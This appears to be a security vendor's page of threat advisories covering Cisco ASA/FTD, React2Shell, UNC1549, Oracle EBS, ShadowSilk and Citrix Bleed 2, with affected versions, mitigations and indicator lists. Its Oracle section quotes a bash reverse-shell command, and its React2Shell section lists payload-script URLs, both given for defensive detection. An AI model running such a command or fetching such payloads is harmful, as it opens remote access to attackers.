Outbreak Alert!
Cisco ASA and FTD Firewall RCE
Released: | Dec 18, 2025 |
Vendor: | Cisco |
Type: | Attack, Vulnerability |
Threat Radar: | 4 |
Severity: |
Overview: Espionage Campaign Targeting Perimeter Network Devices.
Critical zero-day vulnerabilities affecting Cisco Secure Firewall Adaptive Security Appliance (ASA) and Cisco Secure Firewall Threat Defense (FTD) software have been actively exploited in the wild. The campaign is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution on ASAs, as well as manipulating read-only memory (ROM) to persist through reboot and system upgrade. This activity presents a significant risk to victim networks.
With high confidence this activity is related to same threat actor as ArcaneDoor in 2024.
ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organisation, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organisations critical infrastructure entities that are likely strategic targets of interest for many foreign governments.
Background:
This threat activity has been linked to an advanced threat actor associated with the ArcaneDoor campaign (also tracked as UAT4356 / Storm-1849). Cisco assesses with high confidence that the observed exploitation aligns with ArcaneDoor activity first identified in early 2024.
The associated vulnerabilities were publicly disclosed and patched on September 25, 2025, prompting the Cybersecurity and Infrastructure Security Agency (CISA) to issue Emergency Directive (ED) 25-03, which mandates the immediate identification, remediation, and mitigation of potentially compromised devices across affected environments.
Malware and foothold implants have been observed using these vulnerabilities to:
• Establish remote code execution contexts on perimeter devices.
• Maintain persistence even post-reboot or upgrade on systems lacking proper secure boot technology.
• Potentially pivot deeper into internal networks and exfiltrate data or enable additional post-compromise operations.
This campaign highlights a sustained effort by sophisticated adversaries to weaponize zero-day flaws in widely deployed Cisco security appliances, with the goal of espionage and long-term persistence.
Threat Intelligence
This indicates an attack attempt to exploit a Security Bypass vulnerability in Cisco Adaptive Security Appliance and Firepower Threat Defense. The vulnerability is caused by an improper validation of user supplied data when the vulnerable application handles a maliciously crafted request. Successful exploitation could allow the attacker to bypass security checks on vulnerable systems.
Highlights the countries with the highest volume of cyber attacks.
 Germany –58,863 |
 United States of America-12,380 |
 United Arab Emirates-6,403 |
 United Kingdom –5,330 |
 Norway- 3,773 |
Highlights the industries with the highest volume of cyber attacks.
Automotive –40,518 |
Technology- 14,776 |
Banking/Finance/Insurance-7,597 |
MSSP- 5,473 |
Healthcare- 4,968 |
Affected Products:
Cisco ASA software release 9.12 – versions prior to 9.12.4.72
Cisco ASA software release 9.14 – versions prior to 9.14.4.28
Cisco ASA software release 9.16 – versions prior to 9.16.4.85
Cisco ASA software release 9.17 – versions prior to 9.17.1.45
Cisco ASA software release 9.18 – versions prior to 9.18.4.67
Cisco ASA software release 9.19 – versions prior to 9.19.1.42
Cisco ASA software release 9.20 – versions prior to 9.20.4.10
Cisco ASA software release 9.22 – versions prior to 9.22.2.14
Cisco ASA software release 9.23 – versions prior to 9.23.1.19
Cisco FTD software release 7.0 – versions prior to 7.0.8.1
Cisco FTD software release 7.1 – all versions
Cisco FTD software release 7.2 – versions prior to 7.2.10.2
Cisco FTD software release 7.3 – all versions
Cisco FTD software release 7.4 – versions prior to 7.4.2.4
Cisco FTD software release 7.6 – versions prior to 7.6.2.1
Cisco FTD software release 7.7 – versions prior to 7.7.10.1
Impact-Security Bypass: Remote attackers can bypass security checking of vulnerable systems.
Indicators of Compromise 
(IOCs):
There are several known indicators of compromise that defenders can look for when assessing whether their ASA device has been compromised as a result of this attack, as outlined earlier in this post. For example, if any gaps in logging or any recent unexpected reboots are observed, this should be treated as suspicious activity that warrants further investigation. Also, below is a list of IP addresses we identified as having been used by UAT4356. Please note that some of these IPs are part of publicly known anonymization infrastructure and not directly controlled by the attackers themselves. If your organisation does find connections to the provided actor IPs and the crash dump functionality has been altered, please open a case with Cisco TAC.
Recommendations :
There are some known indicators of compromise that customers can look for if they suspect they may have been targeted in this campaign. First, organisations should look for any flows to/from ASA devices to any of the IP addresses present in the IOC list provided at the bottom of this blog. This is one indication that further investigation is necessary.
Additionally, organisations can issue the command show memory region | include lina to identify another indicator of compromise. If the output indicates more than one executable memory region (memory regions having r-xp permissions, see output examples), especially if one of these memory sections is exactly 0x1000 bytes, then this is a sign of potential tampering.
NOTE: Refer to the vendor’s advisory for updates:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW
Likely Actor-Controlled Infrastructure:
- 192.36.57[.]181
- 185.167.60[.]85
- 185.227.111[.]17
- 176.31.18[.]153
- 172.105.90[.]154
- 185.244.210[.]120
- 45.86.163[.]224
- 172.105.94[.]93
- 213.156.138[.]77
- 89.44.198[.]189
- 45.77.52[.]253
- 103.114.200[.]230
- 212.193.2[.]48
- 51.15.145[.]37
- 89.44.198[.]196
- 131.196.252[.]148
- 213.156.138[.]78
- 121.227.168[.]69
- 213.156.138[.]68
- 194.4.49[.]6
- 185.244.210[.]65
- 216.238.75[.]155
Outbreak Alert!
React2Shell Remote Code Execution
Released: | Dec 05, 2025 |
Vendor: | React2Shell |
Type: | Vulnerability |
Threat Radar: | 3.8 |
Severity: |
Overview:
Critical Unauthenticated RCE in React Server Components Actively Exploited in the Wild.
Background:
Due to the widespread use of React and Next.js in production environments, organizations are strongly urged to apply patches immediately, enforce WAF protections on RSC/Flight endpoints, and conduct proactive threat hunting. CISA has added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog following confirmed evidence of active exploitation. AWS Security has also reported exploitation activity originating from infrastructure historically linked to China state-nexus threat actors.
This vulnerability was disclosed as CVE-2025-55182 and is rated CVSS 10.0.
The vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:
react-server-dom-webpack
react-server-dom-parcel
react-server-dom-turbopack
Successful exploitation can lead to:
– Full server compromise, including deployment of persistent backdoors
– Credential harvesting and access to sensitive application data
– Execution of arbitrary Node.js commands on the affected server
– Lateral movement across connected systems and cloud environments.
NOTE: Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.
Threat Intelligence
Additional Resources:
React Blog https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Google Cloud Guidance https://cloud.google.com/blog/products/identity-security/responding-to-cve-2025-55182
Next.js Advisory https://nextjs.org/blog/CVE-2025-66478
AWS Security Blog- https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025
55182/
Organisations should review the vendor advisories for complete version details, mitigation steps, and updated guidance.
Indicators of compromise: IOC Indicator List
| Indicator | Type | Status |
|---|---|---|
http://46.36.37.85:12000/sex.sh | url | Active |
http://141.11.240.103:45178/test.sh | url | Active |
http://162.215.170.26:3000/sex.sh | url | Active |
http://vps-zap812595-1.zap-srv.com:3000/ | url | Active |
http://vps-zap812595-1.zap-srv.com:3000/sex.sh | url | Active |
Below highlights the industries with the highest volume of cyber attacks .
Banking/Finance/Insurance: 4 |
Technology: 2 |
MSSP: 1 |
Media/Communications: 1 |
Below are the top targeted countries .
|
|
|
|
Saudi Arabia: 3
Kazakhstan: 2
Thailand: 1Immediate Action Required
A fix was introduced in versions 19.0.1, 19.1.2, and 19.2.1. If you are using any of the above packages please upgrade to any of the fixed versions immediately.
If your app’s React code does not use a server, your app is not affected by this vulnerability. If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is not affected by this vulnerability.
The following React frameworks & bundlers are affected: next, react-router, waku, @parcel/rsc, @vitejs/plugin-rsc, and rwsdk. Learn more from updated instructions here.
All users should upgrade to the latest patched version in their release line.
Outbreak Alert!
UNC1549 Critical Infrastructure Espionage Attack
Released: | Dec 02, 2025 |
Vendor: | UNC1549 |
Type: | Attack, Malware |
Threat Radar: | 4.6 |
Severity: |
Overview:
Targeted espionage against high-value aerospace/defense and telecom organisations with long-term persistence and custom tooling.
Background:
The threat actor has previously leveraged CVE-2021-26855 and CVE-2020-0688 in past campaigns to gain initial access and facilitate follow-on exploitation.
Since mid-2024, UNC1549 has been executing highly targeted espionage campaigns against organisations in the aerospace, aviation, and defense sectors. The group gains initial access through tailored spear-phishing aimed at credential theft and malware delivery, as well as by compromising trusted third-party access and supply-chain relationships to pivot into downstream environments.UNC1549 employs multiple custom malware families and covert operational techniques to establish persistence and evade detection:
– MINIBIKE: Modular backdoor enabling credential theft, keylogging, screenshot capture, and deployment of additional payloads.
– TWOSTROKE: Remote access tool designed for persistence and full host control.
– DEEPROOT: Linux-focused variant providing similar capabilities across non-Windows platforms.
– LIGHTRAIL & GHOSTLINE: Covert C2 and tunneling tools that disguise malicious traffic within legitimate cloud services to support resilient communications and data exfiltration.
These operations are consistent with state-sponsored intelligence requirements, emphasizing the theft of sensitive technical data, monitoring of high-value communications, and maintaining long-term strategic footholds inside targeted environments.
Threat Intelligence
1.Intrusion Prevention
MS.Exchange.Validation.Key.ViewState.Remote.Code.Execution
Description
This indicates an attack attempt to exploit a Remote Code Execution Vulnerability in Microsoft Exchange Server.
The vulnerability is due to insecure keys. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application, via a crafted HTTP request.
Affected Products:
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 3
Microsoft Exchange Server 2016 Cumulative Update 14
Microsoft Exchange Server 2016 Cumulative Update 15
Microsoft Exchange Server 2019 Cumulative Update 4
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
Impact:
System Compromise: Remote attackers can gain control of vulnerable systems.
Recommended Actions:
Apply the most recent upgrade or patch from the vendor.
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
2-Virus
W32/UNC_1549.A!tr
Analysis:
W32/UNC_1549.A!tr is classified as a trojan.
A trojan is a type of malware that performs activities without the user’s knowledge. These activities commonly include establishing remote access connections, capturing keyboard input, collecting system information, downloading/uploading files, dropping other malware into the infected system, performing denial-of-service (DoS) attacks, and running/terminating processes.
Recommended Action
Make sure that your FortiGate/FortiClient system is using the latest AV database.
Quarantine/delete files that are detected and replace infected files with clean backup copies.
Mitre Matrix:
(a)Initial Access(T1190)-Exploit Public-Facing Application
(b)Lateral Movement(T1210)-Exploitation of Remote Services
Top Targeted Industries:
Technology =51,869 |
Banking/Finance/Insurance = 38,013 |
Media/Communications = 12,471 |
Government = 11,746 |
Outbreak Alert
Oracle E-Business Suite RCE Zero-day
Released: | Oct 08, 2025 |
Vendor: | Oracle |
Type: | Attack, Ransomware |
Threat Radar: | 4.6 |
Severity: |
Overview:
Data theft and extortion campaigns-
Actively exploited as a zero-day in data theft and extortion campaigns, with activity linked to the Cl0p ransomware group. Successful exploitation enables complete takeover of Oracle Concurrent Processing, opening the door to lateral movement, sensitive data exfiltration, and potential ransomware deployment
Background:
CVE-2025-61882 is a critical (CVSS 9.8) unauthenticated remote code execution vulnerability in the BI Publisher integration of Oracle E-Business Suite’s Concurrent Processing component. The flaw is remotely exploitable over HTTP without authentication, allowing attackers to execute arbitrary code and fully compromise affected systems.
Cl0p is the actor behind prior mass exploitation, data theft, and extortion campaigns impacting customers of MOVEit and other managed file transfer solutions.
Threat Intelligence
IOC Indicator List
Indicators of Compromise (IOCs):
The following indicators of compromise represent observed activity (not limited to CVE-2025-61882) and are provided to accelerate detection, threat hunting, and containment.
Indicator | Type | Description |
|---|---|---|
200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Indicator | Type | Status |
|---|---|---|
104.194.11.200 | ip | Active |
104.194.11.200:443 | ip | Active |
161.97.99.49 | ip | Active |
162.55.17.215 | ip | Active |
162.55.17.215:443 | ip | Active |
What customers should do:
Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay. Note that the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.
Indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, hunting, and containment are detailed above.
Outbreak Alert
ShadowSilk Data Exfiltration Attack
Released: Sep 12, 2025
Vendor : Drupal, WordPress
Threat Radar: 4.4
Type: Attack
Severity: 
Common Vulnerabilities and Exposures:
CVE-2018-7600
CVE-2018-7602
CVE-2024-27956
Background:
ShadowSilk is an advanced persistent threat (APT) group active since at least 2023. The group has targeted nearly three dozen organizations across Central Asia and the Asia-Pacific region, with a particular focus on government entities.
Investigations by Group-IB confirmed numerous victims within the Central Asian government sector. ShadowSilk operations are characterized by the use of publicly available exploits, penetration-testing frameworks, and infrastructure sourced from the dark web to facilitate large-scale data exfiltration campaigns.
Threat Intelligence
IOC Indicator List
Solution and Mitigation steps:
CV-2018-7600 and CVE-2018-7602:
Upgrade to the most recent version of Drupal 7 or 8 core.
If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
CVE-2024-27956:
In response to this threat, website owners are urged to take immediate action to protect their WordPress sites. Key mitigation steps include:
Plugin Updates: Ensure that the WP‑Automatic plugin is updated to the latest version.
User Account Review: Regularly review and audit user accounts within WordPress, removing any unauthorized or suspicious admin users.
Security Monitoring: Employ robust security monitoring tools and services like Jetpack Scan to detect and respond to malicious activity on your website. Also, if you are using Jetpack Scan and you’re looking to bolster your website’s security, consider enabling Enhance Protection. By activating this feature, you empower the Web Application Firewall (WAF) to inspect requests directed at standalone PHP files that might be vulnerable. This means that even if attackers attempt to send requests directly to PHP files, our WAF will be there to inspect and safeguard your website against potential threats.
Backup and Restore: Maintain up‑to‑date backups of your website data to facilitate swift restoration in the event of a compromise.
For Jetpack WAF users with old versions of the wp-automatic plugin, we created a rule that effectively blocks access to the vulnerable PHP file, ensuring that all malicious requests are rejected. We also added new rules in our malware database to detect and clean the malware used in this campaign.
Outbreak Alert
Citrix Bleed 2
Released: Aug 06, 2025
| Vendor: | Citrix |
| Type: | Vulnerability |
| Threat Radar: | 3.6 |
| Severity: | |
Common Vulnerabilities and Exposures!
-CVE-2025-5777
-CVE-2025-5349
-CVE-2025-6543
Background:
The vulnerability is named after the infamous Citrix Bleed Attack (CVE-2023-4966) that was previously reported around Oct 2023 and was widely exploited, by multiple threat actors, including ransomware groups. The original flaw also impacted Citrix NetScaler ADC and Gateway appliances.
CVE-2025-5777 is a critical buffer overread vulnerability dubbed as ‘Citrix Bleed 2’ affecting Citrix NetScaler ADC and NetScaler Gateway. The flaw stems from insufficient input validation, enabling an unauthenticated remote attacker to retrieve portions of the server’s memory. Exploiting this issue could allow attackers to access sensitive data directly from memory, potentially exposing credentials, session tokens, or other confidential information.
CVE-2025-6543 is a memory overflow vulnerability leading to unintended control flow and Denial of Service in NetScaler ADC and NetScaler Gateway when configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. Citrix reports that exploitation of CVE-2025-6543 against unmitigated appliances has been observed.
CVE-2025-5349, an improper access control on the NetScaler Management Interface.
Details
NetScaler ADC and NetScaler Gateway contain the vulnerabilities mentioned below:
| CVE ID | Description | Pre-conditions | CWE | CVSSv4 |
| CVE-2025-5349 | Improper access control on the NetScaler Management Interface | Access to NSIP, Cluster Management IP or local GSLB Site IP | CWE-284: Improper Access Control | CVSS v4.0 Base Score: 8.7 (CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L) |
| CVE-2025-5777 | Insufficient input validation leading to memory overread | NetScaler must be configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server | CWE-125: Out-of-bounds Read | CVSS v4.0 Base Score: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L) |
What Customers Should Do
Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.
- NetScaler ADC and NetScaler Gateway 14.1-43.56 and later releases
- NetScaler ADC and NetScaler Gateway 13.1-58.32 and later releases of 13.1
- NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.235 and later releases of 13.1-FIPS and 13.1-NDcPP
- NetScaler ADC 12.1-FIPS 12.1-55.328 and later releases of 12.1-FIPS
